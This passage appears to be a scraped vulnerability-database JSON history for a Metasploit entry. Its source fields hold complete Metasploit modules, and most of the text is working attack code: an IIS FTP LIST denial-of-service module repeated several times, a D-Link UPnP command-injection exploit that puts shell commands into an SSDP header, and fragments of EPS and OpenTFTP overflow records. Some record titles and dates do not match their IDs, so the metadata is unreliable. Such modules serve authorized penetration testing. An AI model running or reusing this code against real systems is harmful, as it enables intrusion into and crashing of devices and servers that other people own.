\"%0000330000660000990000CC0033000033330033660033990033CC0033FF\\r\\n\"\n\n eps = header + sploit + trailer\n\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n\n file_create(eps)\n\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-29T21:02:55", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 88}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-07-29T23:15:46", "history": [], "viewCount": 123, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-07-29T23:15:46"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900944", "OPENVAS:900944", "OPENVAS:900874", "OPENVAS:1361412562310900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-07-29T23:15:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-29T23:15:46", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 89}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "27e9e1da74c163a08f19f7ecfd86904f", "type": "metasploit", "bulletinFamily": "exploit", "title": "D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection", "description": "Different D-Link Routers are vulnerable to OS command injection via UPnP Multicast requests. This module has been tested on DIR-300 and DIR-645 devices. Zachary Cutlip has initially reported the DIR-815 vulnerable. Probably there are other devices also affected.\n", "published": "2014-07-11T14:17:56", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection", "http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html"], "cvelist": [], "lastseen": "2019-07-31T05:02:03", "history": [], "viewCount": 123, "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2019-07-31T05:02:03"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:329925661896306287", "KITPLOIT:6859830935286195620"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:CA0A032ADCA72FCB979CB83795FC527B", "MALWAREBYTES:555FE67CCB2EBFA9A256485E67836C1B"]}, {"type": "redhat", "idList": ["RHSA-2019:1973", "RHSA-2019:1971", "RHSA-2019:1959", "RHSA-2019:1896", "RHSA-2019:1880"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153821", "PACKETSTORM:153801"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-1896"]}, {"type": "krebs", "idList": ["KREBS:216896F0C0F57A5C8D280BF0FFF7AF16"]}, {"type": "mssecure", "idList": ["MSSECURE:49EB91A58B6E96A18F15231ECF41B288"]}, {"type": "thn", "idList": ["THN:110765F121B8FFAB197ACDBB4C117D2E"]}, {"type": "threatpost", "idList": ["THREATPOST:08D7AB11C0B2B0668D71ADCEEB94DB1B"]}, {"type": "hackread", "idList": ["HACKREAD:F3A57A17D7A27E07CA960FB86BBD239D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47182", "EDB-ID:47187"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310113450"]}], "modified": "2019-07-31T05:02:03"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection',\n 'Description' => %q{\n Different D-Link Routers are vulnerable to OS command injection via UPnP Multicast\n requests. This module has been tested on DIR-300 and DIR-645 devices. Zachary Cutlip\n has initially reported the DIR-815 vulnerable. Probably there are other devices also\n affected.\n },\n 'Author' =>\n [\n 'Zachary Cutlip', # Vulnerability discovery and initial exploit\n 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module and verification on other routers\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['URL', 'https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection'], # original exploit\n ['URL', 'http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html'] # original exploit\n ],\n 'DisclosureDate' => 'Feb 01 2013',\n 'Privileged' => true,\n 'Targets' =>\n [\n [ 'MIPS Little Endian',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_MIPSLE\n }\n ],\n [ 'MIPS Big Endian', # unknown if there are big endian devices out there\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_MIPSBE\n }\n ]\n ],\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n Opt::RHOST(),\n Opt::RPORT(1900)\n ])\n\n deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')\n end\n\n def check\n configure_socket\n\n pkt =\n \"M-SEARCH * HTTP/1.1\\r\\n\" +\n \"Host:239.255.255.250:1900\\r\\n\" +\n \"ST:upnp:rootdevice\\r\\n\" +\n \"Man:\\\"ssdp:discover\\\"\\r\\n\" +\n \"MX:2\\r\\n\\r\\n\"\n\n udp_sock.sendto(pkt, rhost, rport, 0)\n\n res = nil\n 1.upto(5) do\n res,_,_ = udp_sock.recvfrom(65535, 1.0)\n break if res and res =~ /SERVER:\\ Linux,\\ UPnP\\/1\\.0,\\ DIR-...\\ Ver/mi\n udp_sock.sendto(pkt, rhost, rport, 0)\n end\n\n # UPnP response:\n # [*] 192.168.0.2:1900 SSDP Linux, UPnP/1.0, DIR-645 Ver 1.03 | http://192.168.0.2:49152/InternetGatewayDevice.xml | uuid:D02411C0-B070-6009-39C5-9094E4B34FD1::urn:schemas-upnp-org:device:InternetGatewayDevice:1\n # we do not check for the Device ID (DIR-645) and for the firmware version because there are different\n # dlink devices out there and we do not know all the vulnerable versions\n\n if res && res =~ /SERVER:\\ Linux,\\ UPnP\\/1.0,\\ DIR-...\\ Ver/mi\n return Exploit::CheckCode::Detected\n end\n\n Exploit::CheckCode::Unknown\n end\n\n def execute_command(cmd, opts)\n configure_socket\n\n pkt =\n \"M-SEARCH * HTTP/1.1\\r\\n\" +\n \"Host:239.255.255.250:1900\\r\\n\" +\n \"ST:uuid:`#{cmd}`\\r\\n\" +\n \"Man:\\\"ssdp:discover\\\"\\r\\n\" +\n \"MX:2\\r\\n\\r\\n\"\n\n udp_sock.sendto(pkt, rhost, rport, 0)\n end\n\n def exploit\n print_status(\"#{peer} - Trying to access the device via UPnP ...\")\n\n unless check == Exploit::CheckCode::Detected\n fail_with(Failure::Unknown, \"#{peer} - Failed to access the vulnerable device\")\n end\n\n print_status(\"#{peer} - Exploiting...\")\n execute_cmdstager(\n :flavor => :echo,\n :linemax => 950\n )\n end\n\n # the packet stuff was taken from the module miniupnpd_soap_bof.rb\n # We need an unconnected socket because SSDP replies often come\n # from a different sent port than the one we sent to. This also\n # breaks the standard UDP mixin.\n def configure_socket\n self.udp_sock = Rex::Socket::Udp.create({\n 'Context' => { 'Msf' => framework, 'MsfExploit' => self }\n })\n add_socket(self.udp_sock)\n end\n\n # Need to define our own rhost/rport/peer since we aren't\n # using the normal mixins\n\n def rhost\n datastore['RHOST']\n end\n\n def rport\n datastore['RPORT']\n end\n\n def peer\n \"#{rhost}:#{rport}\"\n end\n\n # Accessor for our UDP socket\n attr_accessor :udp_sock\n\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-31T05:02:03", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 90}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-07-31T07:00:59", "history": [], "viewCount": 123, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-07-31T07:00:59"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900944", "OPENVAS:900944", "OPENVAS:1361412562310900874", "OPENVAS:900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-07-31T07:00:59"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-31T07:00:59", "differentElements": ["modified", "published"], "edition": 91}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "a8492c8896a6140c62316ed6beef901b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-07-31T13:15:14", "history": [], "viewCount": 123, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-07-31T13:15:14"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "openvas", "idList": ["OPENVAS:900944", "OPENVAS:1361412562310900944", "OPENVAS:1361412562310900874", "OPENVAS:900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:9587", "EDB-ID:17476"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-07-31T13:15:14"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-31T13:15:14", "differentElements": ["modified", "published"], "edition": 92}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "1701ea7952a28f6b5c71b539ce24ebf2", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.\n", "published": "2011-11-26T19:30:35", "modified": "2019-05-23T12:01:21", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:N/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2521", "http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html"], "cvelist": ["CVE-2009-2521"], "lastseen": "2019-07-31T15:05:17", "history": [], "viewCount": 129, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2019-07-31T15:05:17"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2521"]}, {"type": "seebug", "idList": ["SSV:12236", "SSV:12477"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102750"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900944", "OPENVAS:900944", "OPENVAS:1361412562310900874", "OPENVAS:900874"]}, {"type": "exploitdb", "idList": ["EDB-ID:17476", "EDB-ID:9587"]}, {"type": "nessus", "idList": ["SMB_NT_MS09-053.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22610"]}], "modified": "2019-07-31T15:05:17"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-31T15:05:17", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 93}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "b424d7d22283cf3d2cb955094db38499", "type": "metasploit", "bulletinFamily": "exploit", "title": "OpenTFTP SP 1.4 Error Packet Overflow", "description": "This module exploits a buffer overflow in OpenTFTP Server SP 1.4. The vulnerable condition triggers when the TFTP opcode is configured as an error packet, the TFTP service will then format the message using a sprintf() function, which causes an overflow, therefore allowing remote code execution under the context of SYSTEM. The offset (to EIP) is specific to how the TFTP was started (as a 'Stand Alone', or 'Service'). By default the target is set to 'Service' because that's the default configuration during OpenTFTP Server SP 1.4's installation.\n", "published": "2011-12-22T05:24:16", "modified": "2017-07-24T13:26:21", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2161", "http://downloads.securityfocus.com/vulnerabilities/exploits/29111.pl"], "cvelist": ["CVE-2008-2161"], "lastseen": "2019-08-19T19:20:43", "history": [], "viewCount": 129, "enchantments": {"score": {"value": 9.2, "vector": "NONE", "modified": "2019-08-19T19:20:43"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-2161"]}, {"type": "saint", "idList": ["SAINT:A60F3DBC5FC16126618E616B3391ACE4", "SAINT:3448AAC3017714102ABCA44192BC6FF9", "SAINT:C8B1761EC4D6884B0B58DA83CFC31809"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108142"]}, {"type": "exploitdb", "idList": ["EDB-ID:5563"]}, 